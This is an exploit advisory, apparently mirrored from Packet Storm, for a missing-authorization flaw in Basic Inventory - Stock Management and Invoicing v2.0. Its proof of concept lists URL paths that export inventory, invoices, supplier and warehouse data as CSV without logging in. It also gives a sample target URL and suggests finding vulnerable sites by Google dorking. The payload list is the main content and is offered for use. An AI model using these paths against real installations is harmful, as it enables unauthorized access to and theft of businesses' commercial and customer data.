Share
## https://sploitus.com/exploit?id=PACKETSTORM:173358
====================================================================================================================================  
| # Title : Basic Inventory - Stock Management and Invoicing v2.0 Missing Authorization Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |  
| # Vendor : http://incevio.com |   
| # Dork : n/a |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine .  
  
[+] Basic Inventory - Stock Management and Invoicing v2.0 allows for unauthorized administrative access.  
  
[+] Use Payload : /basic-inventory/csv/download_csv/inventory  
  
/basic-inventory/csv/download_csv/items  
  
/basic-inventory/csv/download_csv/invoice_purchase  
  
/basic-inventory/csv/download_csv/invoice_out  
  
/basic-inventory/csv/download_csv/supplier  
  
/basic-inventory/csv/download_csv/warehouse  
  
/basic-inventory/csv/download_csv/category  
  
[+] http://127.0.0.1/demo.incevio.com/basic-inventory/csv/download_csv/inventory  
  
====Greetings to :=====================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |  
=======================================================================================================================================